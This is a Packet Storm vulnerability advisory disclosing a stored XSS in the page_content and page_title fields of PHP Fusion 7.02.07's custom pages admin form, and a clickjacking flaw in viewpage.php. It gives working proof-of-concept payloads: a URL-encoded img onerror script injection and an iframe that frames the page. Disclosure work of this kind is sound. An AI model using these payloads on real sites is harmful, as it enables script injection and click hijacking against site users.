PHP Fusion 7.02.07 XSS / Clickjacking

2015-05-04T00:00:00
ID PACKETSTORM:131741
Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2015-05-04T00:00:00

Description

                                        
                                            `Hi Team,  
  
#Affected Vendor: https://www.php-fusion.co.uk/home.php  
#Date: 04/05/2015  
#Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese  
#Type of vulnerability: Persistent XSS + Clickjacking  
#Tested on: Windows 8.1  
#Product: PHP Fusion  
#Version: 7.02.07  
  
#1 Cross Site Scripting  
x-x-x-x-x-x-x-x-x-x-x-x-  
#Tested Link:  
http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e  
#Description: PHP Fusion is vulnerable to stored cross site scriting  
vulnerability as the parameter "page_content" is vulnerable which will lead  
to its compromise.  
#Proof of Concept (PoC):  
page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page  
  
#2 UI redress attack  
x-x-x-x-x-x-x-x-x-x-x  
#Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5  
#Description: PHP Fusion is vulnerable to UI redress attack as multiple  
transparent or opaque layers can be used to trick a user into clicking on a  
button or link on another page when they were intending to click on the the  
top level page.  
#Proof of Concept (PoC): <iframe src="  
http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900  
height=900> Please check me out !!!! </iframe>  
  
--   
Regards,  
  
*Joel V*  
`